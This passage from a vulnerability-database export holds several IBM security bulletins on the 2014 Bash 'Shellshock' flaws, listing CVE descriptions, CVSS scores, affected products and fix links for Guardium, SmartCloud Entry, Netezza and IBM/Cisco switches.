[_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM InfoSphere Guardium Database Activity Monitoring versions 8.2, 9.0, 9.1 both 32bit and 64bit \n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nIBM InfoSphere Guardium Database Activity Monitoring| 8.2| \n| [_http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-8.2p242_Advisories_2209_2230&includeSupersedes=0&source=fc_](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-8.2p242_Advisories_2209_2230&includeSupersedes=0&source=fc>) \nIBM InfoSphere Guardium Database Activity Monitoring| 9.x 32bit and 64bit| \n| [_http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-9.0p1061_Advisories_2209_2230&includeSupersedes=0&source=fc_](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-9.0p1061_Advisories_2209_2230&includeSupersedes=0&source=fc>) \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\nCVSS Guide -<http://www.first.org/cvss/v2/guide> \n[__On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/psirt>) \n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n30 September 2014\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSMPHH\",\"label\":\"IBM Security Guardium\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.1;9.0;8.2\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-16T10:15:46", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM InfoSphere Guardium Database Activity Monitoring (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-07-16T10:15:46", "id": "6BED381F0625A1CEE6FF30731B3F37C8E1BC1D95ED40906A48FF91875BFEA753", "href": "https://www.ibm.com/support/pages/node/252275", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM SmartCloud Entry appliance.\n\n## Vulnerability Details\n\nCVE-ID: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96153> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7169](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96209> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7186](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96237> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7187](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96238> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-6277](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96686> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-6278](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96687> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Starter Kit for Cloud 2.2.0. \n\nIBM SmartCloud Entry appliance versions 2.3.0, 2.4.0, 3.1.0, and 3.2.0.\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nIBM Starter Kit for Cloud| 2.2.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+Starter+Kit+for+Cloud&function=fixid&fixids=2.2.0.1-IBM-SKC_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+Starter+Kit+for+Cloud&function=fixid&fixids=2.2.0.1-IBM-SKC_APPL-FP001>) \nIBM SmartCloud Entry appliance| 2.3.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.3.0.1-IBM-SCE_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.3.0.1-IBM-SCE_APPL-FP001>) \nIBM SmartCloud Entry appliance| 2.4.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.4.0.1-IBM-SCE_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.4.0.1-IBM-SCE_APPL-FP001>) \nIBM SmartCloud Entry appliance| 3.1.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.1.0.4-IBM-SCE_APPL-FP06](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.1.0.4-IBM-SCE_APPL-FP06>) \nIBM SmartCloud Entry appliance| 3.2.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.2.0.3-IBM-SCE_APPL-FP06](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.2.0.3-IBM-SCE_APPL-FP06>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[Subscribe to Security Bulletins](<htttp://www.ibm.com/support/mynotifications>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n31 October 2014: Updated description, CVSS Base Score, and CVSS Vector for CVE-2014-7186 and CVE-2014-7187. \n2 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SST55W\",\"label\":\"IBM Cloud Manager with OpenStack\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.3;2.4;3.1;3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-19T00:49:12", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2020-07-19T00:49:12", "id": "0684E6CA4C2678854DD2AF881EFBA469B9153F9B25226D0E89F7A8E363B90191", "href": "https://www.ibm.com/support/pages/node/679549", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM Netezza Host Management.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nAll IBM PureData System for Analytics (Netezza) appliances operating on RedHat 5.3-5.10 and RedHat 6.2-6.5.\n\n## Remediation/Fixes\n\nIBM Netezza Host Management\n\n| 5.3.1| None| [http://www-933.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=5.3.1.0-IM-Netezza-HOSTMGMT-fp89859&continue=1](<http://www-933.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=5.3.1.0-IM-Netezza-HOSTMGMT-fp89859&continue=1>) \n---|---|---|--- \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n31 October 2014: Updated for revised CVSS base scores \n07 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSULQD\",\"label\":\"IBM PureData System\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Administration\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.0.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-18T03:10:29", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Netezza Host Management (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2019-10-18T03:10:29", "id": "BADBBFD3B80B37BA80822E3D89F7CE0842CD6F0C0F9476386BC6B381BF85302E", "href": "https://www.ibm.com/support/pages/node/253033", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T23:42:59", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM/Cisco switches and directors.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96153_](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96209_](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n**The Following are IBM/Cisco Switches and Directors:** \n \n**IBM MTM:** \n \n**9710-E01 **MDS 9250i Multilayer Fabric Switch \n**9710-E08 **MDS 9710 Director \n**2054-E01 **MDS 9222i Multilayer Fabric Switch \n**2054-E04 **(2062-D04) MDS 9506 Multilayer Director \n**2054-E11 (**2062-E11) MDS 9513 